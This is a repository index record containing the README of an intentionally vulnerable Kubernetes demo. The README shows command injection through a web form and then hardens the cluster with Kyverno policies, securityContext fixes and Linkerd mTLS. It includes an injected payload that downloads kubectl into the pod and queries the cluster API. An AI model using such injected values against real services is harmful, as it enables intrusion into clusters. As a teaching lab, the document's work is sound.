{"id":25024227,"url":"https://github.com/gridexx/vulnerable-web-stack-kube","last_synced_at":"2026-04-13T01:11:06.107Z","repository":{"id":218578037,"uuid":"746759749","full_name":"GridexX/vulnerable-web-stack-kube","owner":"GridexX","description":"How missconfigured services inside Kubernetes can lead to privilegies escalation","archived":false,"fork":false,"pushed_at":"2024-02-17T11:07:34.000Z","size":7758,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-05T15:54:56.694Z","etag":null,"topics":["kubernetes","security","workload"],"latest_commit_sha":null,"homepage":"","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GridexX.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-01-22T16:11:44.000Z","updated_at":"2024-02-17T11:40:44.000Z","dependencies_parsed_at":"2024-02-17T12:33:36.293Z","dependency_job_id":null,"html_url":"https://github.com/GridexX/vulnerable-web-stack-kube","commit_stats":null,"previous_names":["gridexx/gridexx-vulnerable-web-stack-kube"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GridexX","download_url":"https://codeload.github.com/GridexX/vulnerable-web-stack-kube/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246328748,"owners_count":20759821,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["kubernetes","security","workload"],"created_at":"2025-02-05T15:52:35.540Z","updated_at":"2026-04-13T01:11:01.081Z","avatar_url":"https://github.com/GridexX.png","language":"TypeScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/GridexX/vulnerable-web-stack-kube/assets/50552672/990b9e90-7446-4c4f-b9ad-4fe1225d21fd\" width=\"300\"\u003e\n  \u003ch1\u003e\n    Vulnerable Web Stack Kube\n  \u003c/h1\u003e\n  \u003ch4\u003eHow missconfigured services inside Kubernetes can lead to privilegies escalation\u003c/h4\u003e\n  \u003cp align=\"center\"\u003e\n    \u003ca href=\"https://github.com/GridexX/vulnerable-web-stack-kube\"\u003e\u003cimg src=\"https://img.shields.io/github/stars/GridexX/vulnerable-web-stack-kube.svg?style=flat\" alt=\"stars\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://github.com/GridexX/vulnerable-web-stack-kube\"\u003e\u003cimg src=\"https://img.shields.io/github/license/GridexX/vulnerable-web-stack-kube.svg?style=flat\" alt=\"license\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/div\u003e\n\n\n\nThere are two services in this repository, a client and a server. The client is a simple web application that send a message to the server. The server is a simple web application that receive a message and display it in the console with the cowsay command.\n\n## How to use it ❓\n\n```bash\ncd vulnerable-web-stack-kube\nkubectl apply -f ./k8s/resources\n# Port-forward the client and server application\nkubectl port-forward client-deployment-ip-service 8080:80\nkubectl port-forward server-deployment-ip-service 3000:8000\n```\n\n### Try the vulnerability 🥷\n\nOpen your browser and go to [http://localhost:8080](http://localhost:8080). You will see a form with a text area. Write a message and click on the send button. You will see the message displayed in the console of the server pod.\n\nCopy and paste the following text into the text area:\n\n```bash\nhello; curl -LO https://dl.k8s.io/release/$(curl -Ls https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl; chmod +x ./kubectl\n```\n\nThis will download kubectl inside the pod and give us the possibility to execute command inside the pod\n\n```bash\nhello; ./kubectl get pods\n```\n\nWe can see that the command is executed inside the pod and that we can reach the kube API\n\n### Protect the cluster with kyverno 🏰\n\nTo protect the cluster we will use kyverno. Kyverno is a policy engine for Kubernetes. It allows us to define policies that will be applied to the cluster.\nWe will also display the policy violations in a grafana dashboard.\nTo do so, we will deploy the kube-prometheus-stack chart and kyverno with Helm:\n\n```bash\n# Install the Helm repository\ncd ./vulnerable-web-stack-kube\nhelm repo add kyverno https://kyverno.github.io/kyverno/\nhelm repo add prometheus-community https://prometheus-community.github.io/helm-charts\nhelrm repo update\nhelm install kyverno kyverno/kyverno -f k8s/values/kyverno-values.yaml -n kyverno --create-namespace\nhelm install prom-stack prometheus-community/kube-prometheus-stack -f k8s/values/prom-stack-values.yaml\n# Port-forward the grafana dashboard\nkubectl port-forward -n prom-stack-grafana-uuid 3001:3000\n\n# Fix the policy violation\n# Remove the resources\nkubectl delete -f ./k8s/resources\n# Apply the policies\nkubectl apply -f ./k8s/policies\n```\n\nNow if we re-deploy the resources, we will se that the server pod is not created.\n\nTo fix the policy violation, we added `securityContext` fields in the deployment manifest of the server.\nWith this fixed manifest, the server pod will be created. Apply the fixed manifest with:\n\n```yaml\n# Reapply the fixed resources policies\nkubectl apply -f ./k8s/resources_fixed\n```\n\nRestart the port-forwarding of the server pod and try again the vulnerability. You will see that the command is not executed inside the pod :cwhite_check_mark:\n\n#### See the policy violations in the grafana dashboard 📊\n\nGo to [http://localhost:3001](http://localhost:3001) and login with the default credentials (admin:prom-operator).\nYou will see the dashboard with the policy violations.\n\n### Sign and build the docker images ✍️\n\nThis step describes how to build and sign the docker images.\n\n1. The server\n\n    ```bash\n    cd ./services/server\n    docker build -t \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-server:latest .\n    docker trust sign \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-server:latest\n    ```\n\n2. The client\n\n    ```bash\n    cd ./services/client\n    docker build -t \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-client:latest .\n    docker trust sign \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-client:latest\n    ```\n\n### Add a service Mesh and mTLS communication between services\n\n\u003e [!NOTE]\n\u003e This step is optional and requires a service mesh like Linkerd. To do so, you first need to install the Linkerd CLI and the Linkerd control plane.\n\n1. Install the Linkerd CLI\n\n    ```bash\n    curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh\n    export PATH=$PATH:$HOME/.linkerd2/bin\n    ```\n\n2. Install the Linkerd control plane\n\n    To check that check and validate that everything is configured and your cluster is ready to install Linkerd, run:\n\n    ```bash\n    linkerd check --pre\n    ```\n\n    If there are any checks that do not pass, make sure to follow the provided links and fix those issues before proceeding.\n\n    Now Install the Linkerd control plane by running:\n\n    ```bash\n        linkerd install | kubectl apply -f -\n    ```\n\n3. Install Linkerd onto your cluster\n\n    Now that you have the CLI running locally and a cluster that is ready to go, it’s time to install Linkerd on your Kubernetes cluster. To do this, run:\n\n    ```bash\n    linkerd install --crds | kubectl apply -f -\n    linkerd install | kubectl apply -f -\n    ```\n\n    Wait for the control plane to be ready (and verify your installation) by running:\n\n    ```bash\n    linkerd check\n    ```\n\n4. Add mTLS communication between the services\n\n    Ensure, the Server and Client services are running in the `default` namespace. We will now install the Linkerd service mesh and add mTLS communication between the services.\n\n    ```bash\n    kubectl get deploy -o yaml \\\n    | linkerd inject - \\\n    | kubectl apply -f -\n    ```\n\n    This command retrieves all of the deployments running, runs their manifests through linkerd inject, and then reapplies it to the cluster. This will add the Linkerd proxy to each of the deployments, and enable mTLS communication between the services.\n\n    \u003e [!NOTE]\n    \u003e Congratulations! You have now installed Linkerd and added mTLS communication between the services.\n\n5. Explore the Linkerd dashboard (optional)\n\n    We’ve added Linkerd to Cowsay, but there are no visible changes to the application!\n\n    Let’s take a closer look at what Linkerd is actually doing. To do this, let’s install the viz extension, which will install an on-cluster metric stack and dashboard.To install the viz extension, run:\n\n    ```bash\n    linkerd viz install | kubectl apply -f - # install the on-cluster metrics stack\n    ```\n\n    Once you’ve installed the extension, let’s validate everything one last time:\n\n    ```bash\n    linkerd check\n    ```\n\n    With the control plane and extensions installed and running, we’re now ready to explore Linkerd! Access the dashboard with:\n\n    ```bash\n    linkerd viz dashboard \u0026\n    ```\n\n    This command will open the Linkerd dashboard in your default web browser.\n\n## Clean the cluster 🗑️\n\n```bash\nkubectl delete -f ./k8s/policies\nkubectl delete -f ./k8s/resources\n```\n\n### Licence\n\nThis project is licensed under the MIT License - see the LICENSE file for details. \n\n### Author 👨‍💻\n\nDevelopped in the ☁️ with 🔒 by [GridexX](https://github.com/GridexX)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube/lists"}